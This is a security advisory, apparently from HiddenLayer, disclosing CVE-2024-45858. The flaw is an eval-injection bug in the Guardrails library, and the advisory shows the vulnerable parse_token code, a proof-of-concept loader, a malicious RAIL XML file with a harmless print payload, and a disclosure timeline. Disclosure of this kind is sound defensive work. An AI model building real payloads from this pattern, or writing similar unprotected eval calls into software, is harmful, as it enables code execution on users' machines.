HiddenLayer is the leading provider of Security for AI. Its security platform helps enterprises safeguard the machine learning models behind their most important products. HiddenLayer is the only company to offer turnkey security for AI that does not add unnecessary complexity to models and does not require access to raw data and algorithms. Founded by a team with deep roots in security and ML, HiddenLayer aims to protect enterprise’s AI from inference, bypass, extraction attacks, and model theft. The company is backed by a group of strategic investors, including M12, Microsoft’s Venture Fund, Moore Strategic Ventures, Booz Allen Ventures, IBM Ventures, and Capital One Ventures.
September 18, 2024
Eval on XML parameters allows arbitrary code execution when loading RAIL file
CVE Number
CVE-2024-45858
Summary
An arbitrary code execution vulnerability exists inside the parse_token function of the guardrails/guardrails/validatorsattr.py Python file. The vulnerability requires the victim to load a malicious XML guardrails file, allowing an attacker to run arbitrary Python code on the program’s machine when the file is loaded. The vulnerability exists because of the use of an unprotected eval function.
Products Impacted
This vulnerability is present in Guardrails v0.2.9 to v0.5.0.
CVSS Score: 7.8
AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE Categorization
CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code (‘Eval Injection’)
Details
This vulnerability lies in the parse_token method of the ValidatorsAttr class in the guardrails/guardrails/validatorsattr.py Python file.
def parse_token(token: str) -> Tuple[str, List[Any]]:
...
is_hub_validator = token.startswith(hub)
max_splits = 2 if is_hub_validator else 1
validator_with_args = token.strip().split(":", max_splits)
if len(validator_with_args) == 1:
return validator_with_args[0].strip(), []
elif is_hub_validator and len(validator_with_args) == 2:
return ":".join(validator_with_args[0:2]).strip(), []
validator, args_token = (
[":".join(validator_with_args[0:2]).strip(), validator_with_args[2]]
if is_hub_validator
else validator_with_args
)
# Split using whitespace as a delimiter, but not if it is inside curly braces or
# single quotes.
pattern = re.compile(r"\s(?![^{}]*})|(?<!')\s(?=[^']*'$)")
tokens = re.split(pattern, args_token)
# Filter out empty strings if any.
tokens = list(filter(None, tokens))
args = []
for t in tokens:
# If the token is enclosed in curly braces, it is a Python expression.
t = t.strip()
if t[0] == "{" and t[-1] == "}":
t = t[1:-1]
try:
# Evaluate the Python expression.
t = eval(t)
except (ValueError, SyntaxError, NameError) as e:
raise ValueError(
f"Python expression `{t}` is not valid, "
f"and raised an error: {e}."
)
args.append(t)
return validator.strip(), args
The error is due to the use of the eval function to parse the arguments of a validator from an XML file. This can easily be exploited with the code below:
import guardrails as gd
guard = gd.Guard.from_rail('malicious.xml')
And the malicious.xml file.
<rail version="0.1">
<output
type="string"
validators="test:{print('\n\narbitrary code execution\n\n')};"
/>
</rail>
When the user loads the maliciously constructed XML file, which they may have found recommended on a forum or GitHub repo, the contents of the validators attribute of the output tag are split along the ‘:’ character into the validator on the right and its arguments on the left. If the arguments are wrapped in ‘{}’, they are passed into an eval function in the parse_token function in guardrails/guardrails/validatorsattr.py. This allows arbitrary code execution on the victim’s device.
Timeline
July, 8 2024 — Reached out to multiple administrators through their communication channel
July, 9 2024 — Reached out to one more administrator
July, 16 2024 — Vendor responded asking we send the report to the email [email protected]
September, 6 2024 — Final attempt to reach out prior to disclosure date
September, 6 2024 — Vendor responded asking how best to handle this
September, 9 2024 — Responded to vendor answering their questions
September, 16 2024 — Vendor responded confirming fixes will be merged and pushed on 17 September 2024
September, 17 2024 — Vendor reached out to say the fix has been deployed to version 0.5.10
September, 18 2024 — HiddenLayer public disclosure